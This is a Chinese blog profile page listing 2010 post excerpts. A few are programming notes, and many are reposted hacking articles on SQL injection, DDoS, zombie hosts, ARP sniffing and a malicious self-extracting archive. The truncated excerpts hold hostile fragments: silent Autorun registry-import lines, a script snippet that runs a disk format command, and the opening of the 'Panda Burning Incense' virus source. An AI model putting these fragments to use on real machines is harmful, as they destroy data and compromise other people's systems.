自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(20)
  • 收藏
  • 关注

原创 EL表达式取servlet中的对象

EL的语法:<br /><br />比如: request.setAttibute("person",Person);<br /><br />在JSP页面中如何访问person呢?<br /><br /><html><br /><br /><body><br /><br />the person is: ${person}<br /><br /></body><br /><br /></html><br /><br />如何访问一个对象的属性呢?比方说一个对象 Person 的 name属性<br /><b

2010-08-13 15:51:00 1004

原创 SQL触发器

一个简单的小实例就明白~! user表在这张表中建立触发器   Create   trigger   tiggername   on   user      for   delete      as    begin        delete   from   user2    end;       当删除表user中的某一记录时,user2表里的数据全部删除~! 如果要

2010-03-11 23:06:00 440

原创 DataGridView控件与SQL多表连接~!

一个最简单的代码段:string sql = string.Format("select Consult_Info.CName,Consult_Record.RTime,Consult_Record.RContent,Emp_Info.EName,CMode.Mode from Consult_Info inner join Consult_Record on(Consult_Info.CID

2010-03-06 22:49:00 1052

转载 SQL注入入侵动网SQL

编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是SA帐号,就更是麻烦了。 正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的入侵行

2010-02-24 19:24:00 525

转载 DDoS攻击原理及防范(一)

分布式拒绝服务攻击(DDoS)是目前黑客经常采用而难以防范的攻击手段。本文从概念开始详细介绍了这种攻击方式,着重描述了黑客是如何组织并发起的DDoS攻击,结合其中的Syn Flood实例,您可以对DDoS攻击有一个更形象的了解。最后作者结合自己的经验与国内网络安全的现况探讨了一些防御DDoS的实际手段。  DDoS攻击概念        DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服

2010-02-24 19:23:00 583

转载 用自解压包入侵

用自解压包删光别人的硬盘,相信大家都会。我给大家介绍个用自解压包入侵的方法。 如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识破。如果不用木马, 用些批处理炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。 把以下两行保存为Autorun.inf [Autorun] open=regedit /s Autorun.reg 把以下一段保存为Autorun.reg REGEDIT4

2010-02-24 19:22:00 494

转载 简单突破QQ好友拒加

我们有遇到这样的情况。就是有MM号Q号。但她好友上设置为拒加。加不了就不能聊天。为此而苦恼。现在教大家一种简单的方法。轻易绕过骗验和MM聊天 以QQ:10000来试范 下面看****作。 先加一下10000。状态是拒加的。 在生成在线状态的网页上,填上你需要和她的聊的QQ号码~ 然后复制代码。 在桌面新建一个空文档,把代码复制进去。 保存后,把后缀名改为htm 这样就可以了。 打开试试 这样就开了

2010-02-24 19:21:00 2188 2

转载 熊猫烧香--核心代码1

program japussy; uses windows, sysutils, classes, graphics, shellapi{, registry}; const headersize = 82432;             //病毒体的大小 iconoffset = $12eb8;           //pe文件主图标的偏移量 //在我的delphi5 sp1上面编译得到的大小,

2010-02-24 19:20:00 525

转载 常用的DoS命令:IPC$口令

DOS 常用命令: dir 列文件名       deltree 删除目录树        cls 清屏           cd 改变当前目录 copy 拷贝文件      diskcopy 复制磁盘         del 删除文件       format 格式化磁盘 edit 文本编辑      mem 查看内存状况          md 建立子目录      move 移动文件、改目录

2010-02-24 19:20:00 805

转载 建立你的3389肉鸡

在当今世界上,电脑信息网络使人们得以在国内各地乃至全球范围内交换各种各样的信息,正所谓“足不出户能知天下事”。在目前全球性电脑信息网络中,最为成功和覆盖面最大、信息资源最丰富的当属 现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台

2010-02-24 19:18:00 491

转载 黑客入侵的基础:口令入侵法

要入侵系统首先阻碍我们的将是网络管理员的第一道安全防线——合法的用户名与口令,它决定于你在该网站的权限,所以口令入侵法可以说是黑客的基础,对于一个刚开始学习HACK的网友这篇文章可能会让你大有所进。   当我们要试着解密之前我们得先来了解一下加密的过程,兼于加密方法的种类之多,我们就讲一下标准的UNIX加密技术,但关于DES加密技术的材料很少这主要是IBM应美国国家安全局的要求把某些文档定为了国家

2010-02-24 19:17:00 848

转载 不是所有的黑客都是罪犯!

黑客有自己的道德准则:所有的信息都应当是免费的;打破电脑集权;计算机使生活更美好等 普通的电脑程序员要成为黑客也不难,但要成为一名黑客高手,除了智慧,还要有足够的耐心和毅力 网络安全最薄弱的环节并不是系统漏洞,而是人的漏洞 电脑黑客是一群处于地下状态的电脑狂人,尽管技术高超,但他们却不能抛头露面,他们的网站一律以黑色为背景,平添几分神秘色彩。想到黑客,人们脑中就闪现出两个字:罪犯。 不过最近,这些

2010-02-24 19:16:00 573

转载 头号电脑黑客凯文·米特尼克

在全球的黑客名单中,凯文·米特尼克是最具传奇色彩的人物。好莱 坞甚至把他搬上了银幕。在他15岁的时候,仅凭一台电脑和一部调制解 调器就闯入了北美空中防务指挥部的计算机系统主机。美国联邦调查局 将他列为头号通缉犯,并为他伤透了脑筋。可以说,米特尼克是真正的 少年黑客第一户。 凯文·米特尼克于1964年出生在美国西海岸的洛杉矶。只有3岁的时候 ,他的父母就离异了。他跟着母亲生活,很快就学会了自立,但父

2010-02-24 19:15:00 2586

转载 早期的黑客

hacker时代的滥觞始於1961 年mit出现第一台电脑dec pdp-1。mit的tech model railroad club(简称tmrc)的power and signals group买了这台机器後,把它当成最时髦的科技玩具,各种程式工具与电脑术语开始出现,整个环境与文化一直发展下去至今日。 这在steven levy的书`hackers 前段有详细的记载(anchor/doubl

2010-02-24 19:15:00 566

转载 ARP监听渗透内网的方法

假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆      第一步: tracert 61.139.1.1 C:/WIN2000/system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hop

2010-02-24 19:09:00 423

转载 恶意代码(黑客)` 仅供学习

                                                        1、格式化硬盘[Copy to clipboard]CODE: scr.Reset(); scr.Path="C:/windows/Men?inicio/Programas/Inicio/automat.hta"; scr.Doc="wsh.Run(start /m format a

2010-02-24 19:06:00 599

转载 浅析七种DDoS攻击技术

DDOS攻击是现在最常见的一种黑客攻击方式,下面就给大家简单介绍一下DDOS的七种攻击方式。    1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。 2.Smurf:该攻击向一个子网的广播地

2010-02-24 19:04:00 532

转载 黑客常用九种攻击方法

许多上网的用户对网络安全可能抱着无所谓的态度,认为最多不过是被“黑客”盗用账号,他们往往会认为“安全”只是针对那些大中型企事业单位的,而且黑客与自己无怨无仇, 干嘛要攻击自己呢?其实,在一无法纪二无制度的虚拟网络世界中,现实生活中所有的阴险和卑鄙都表现得一览无余,在这样的信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在

2010-02-24 19:00:00 1465

转载 c#如何计算两个日期相差几年几个月?C#日期间隔 c#时间间隔

/// /// 计算日期的间隔(静态类)/// public static class dateTimeDiff{    ///     /// 计算日期间隔    ///     /// 要参与计算的其中一个日期字符串    /// 要参与计算的另一个日期字符串    /// 一个表示日期间隔的TimeSpan类型    public static TimeSpan toResult(strin

2010-02-22 22:25:00 6511

转载 程序员需要具备的基本技能

   程序员需要具备的基本技能                                            软件开发是一个跨度很大的技术工作,在语言方面,有C,C++,Java,Ruby等等等等,在环境方面,又分嵌入式,桌面系统,企业级,WEB,基础系统,或是科学研究。但是,不管是什么的情况,总是有一些通用的基本职业技能。这些最基本的职业技能通常决定了一个程序员的级别,能否用

2010-02-18 21:36:00 421

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除